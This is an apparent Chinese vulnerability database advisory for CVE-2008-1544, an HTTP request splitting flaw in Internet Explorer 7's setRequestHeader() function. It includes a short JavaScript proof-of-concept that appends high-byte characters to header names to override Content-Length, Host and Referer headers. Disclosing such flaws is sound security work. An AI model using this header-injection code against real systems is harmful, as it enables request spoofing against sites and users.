Microsoft IE 7 setRequestHeader()函数请求拆分漏洞 CVE-2008-1544 CNNVD-200803-469

7.1 AV AC AU C I A
发布: 2008-03-28
修订: 2023-12-07

Internet Explorer是微软发布的非常流行的WEB浏览器。 IE 7允许通过HTTP请求拆分攻击覆盖Content-Length、Host和Referer等HTTP头,导致HTTP头信息欺骗。 类似于以下javascript: ---------------------------------------------- var x=new XMLHttpRequest(); x.open(\"POST\",\"/\"); for(f=127;f<255;f++) try{ x.setRequestHeader(\"Host\"+String.fromCharCode(f),\"Test\"); }catch(dd){} x.setRequestHeader(\"Connection\",\"keep-alive\"); x.onreadystatechange=function (){ if (x.readyState == 4){ } } x.send(\"blah\"); ---------------------------------------------- 会覆盖以下头: - Content-Length x.setRequestHeader(\"Content-Length\"+String.fromCharCode(201),\"0\"); x.setRequestHeader(\"Content-Length\"+String.fromCharCode(233),\"0\"); x.setRequestHeader(\"Content-Length\"+String.fromCharCode(240)+String.fromCharCode(213),\"0\"); - Host x.setRequestHeader(\"Host\"+String.fromCharCode(223), \"www.microsoft.com\"); - Referer x.setRequestHeader(\"Referer\"+String.fromCharCode(205)+String.fromCharCode(155),\"http://www.referrer.tld\");...

0%
暂无可用Exp或PoC
当前有21条受影响产品信息